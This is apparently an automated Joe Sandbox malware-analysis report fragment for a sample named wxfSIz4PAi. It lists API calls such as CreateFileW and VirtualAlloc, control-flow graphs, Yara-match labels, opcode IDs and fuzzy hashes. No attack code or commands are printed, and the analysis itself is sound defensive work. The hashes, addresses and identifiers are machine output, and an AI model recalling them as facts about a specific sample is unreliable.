                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeString$Uninitialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1985688103-0
                                                                                                                                                                                                                              • Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                              • Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1829 419cc3-419ced 1830 419cf6-419d00 1829->1830 1831 419cef-419cf1 1829->1831 1833 419d02-419d11 call 413b67 1830->1833 1834 419d27-419d33 1830->1834 1832 419dc3-419dc8 1831->1832 1845 419f05-419f34 call 410932 CreateFileW 1833->1845 1846 419d17-419d1f 1833->1846 1836 419d35-419d3a 1834->1836 1837 419d7a 1834->1837 1840 419d68-419d73 1836->1840 1841 419d3c-419d41 1836->1841 1838 419d7c-419d82 1837->1838 1843 419dc0 1838->1843 1844 419d84-419d88 1838->1844 1840->1838 1842 419d75-419d78 1840->1842 1841->1840 1847 419d43-419d48 1841->1847 1842->1838 1853 419dc2 1843->1853 1844->1843 1848 419d8a-419d9d 1844->1848 1849 419d21 1846->1849 1850 419d64-419d66 1846->1850 1847->1842 1851 419d4a-419d4f 1847->1851 1854 419daa-419daf 1848->1854 1855 419d9f-419da4 1848->1855 1849->1834 1850->1834 1851->1842 1856 419d51-419d56 1851->1856 1853->1832 1854->1843 1860 419db1-419db4 1854->1860 1858 419da6-419da8 1855->1858 1859 419e08-419e20 call 4192ad 1855->1859 1861 419d58-419d5d 1856->1861 1862 419d5f-419d62 1856->1862 1858->1843 1858->1854 1873 419e22-419e29 1859->1873 1874 419e2b-419e2e 1859->1874 1865 419db6-419db9 1860->1865 1866 419dfd-419dff 1860->1866 1861->1838 1861->1862 1862->1838 1869 419dc9-419dda call 419800 1865->1869 1870 419dbb-419dbe 1865->1870 1867 419e00-419e02 1866->1867 1867->1859 1872 419ea3-419ea5 1867->1872 1876 419eab-419eb6 1869->1876 1879 419de0-419df3 call 419800 1869->1879 1870->1843 1870->1866 1872->1843 1872->1876 1873->1874 1877 419e60-419e67 call 412381 1874->1877 1878 419e30-419e36 1874->1878 1880 419ec9-419ed2 1876->1880 1881 419eb8-419ebb 1876->1881 1877->1853 1883 419e49-419e53 1878->1883 1884 419e38-419e3b 1878->1884 1879->1877 1901 419df5-419dfb 1879->1901 1890 419ed3-419ed5 1880->1890 1881->1890 1891 419ebd-419ec7 1881->1891 1887 419e55-419e5a call 412381 1883->1887 1888 419e6c-419e71 1883->1888 1885 419e3d-419e42 1884->1885 1886 419e8e-419ea1 call 419800 1884->1886 1885->1883 1893 419e44-419e47 1885->1893 1886->1872 1886->1877 1887->1877 1888->1886 1897 419e73-419e87 call 419800 1888->1897 1890->1843 1896 419edb-419ef4 call 415fa3 1890->1896 1891->1896 1893->1872 1896->1877 1906 419efa-419efe 1896->1906 1897->1877 1907 419e89-419e8c 1897->1907 1901->1867 1906->1896 1908 419f00 1906->1908 1907->1872 1908->1843
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 823142352-2766056989
                                                                                                                                                                                                                              • Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
                                                                                                                                                                                                                              • Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1909 401bb2-401c21 call 42780c call 40307c call 402fe5 call 402f6b 1918 401c51-401c61 1909->1918 1919 401c23-401c47 1909->1919 1919->1918 1920 401c49-401c4c call 40187f 1919->1920 1920->1918
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                              • String ID: v*@
                                                                                                                                                                                                                              • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                              • Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                              • Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 420165198-0
                                                                                                                                                                                                                              • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,05B60223,?,?), ref: 05B60E19
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,05B60223,?,?), ref: 05B60E1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction ID: 3e0aa8743782800158683d77dbeedf7124d26355c5c09d01931b5454394fd244
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDD0123154512C77D7003A95DC0DBCD7B1CEF09B62F008051FB0DD9080C774954046E5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
                                                                                                                                                                                                                              • Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                              • Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                              • Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 938716162-0
                                                                                                                                                                                                                              • Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                              • Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                              • Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                              • Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                              • Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                              • Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                              • Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                              • Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
                                                                                                                                                                                                                              • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3585332825-0
                                                                                                                                                                                                                              • Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                              • Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                              • Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
                                                                                                                                                                                                                              • Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                                                                                              • Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
                                                                                                                                                                                                                              • Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                              • Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 040F58E6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction ID: 08da15c99fa2883c8e63932d5714016fedd5b000ffe9cf906c14193a8090b7f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0113279A00208FFDB01DF98C985E98BBF5AF08351F0580A4F9489B362D375EA50DF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B86823: __EH_prolog.LIBCMT ref: 05B86828
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05B84D3B
                                                                                                                                                                                                                                • Part of subcall function 05B862B1: __EH_prolog.LIBCMT ref: 05B862B6
                                                                                                                                                                                                                                • Part of subcall function 05B862B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05B86398
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
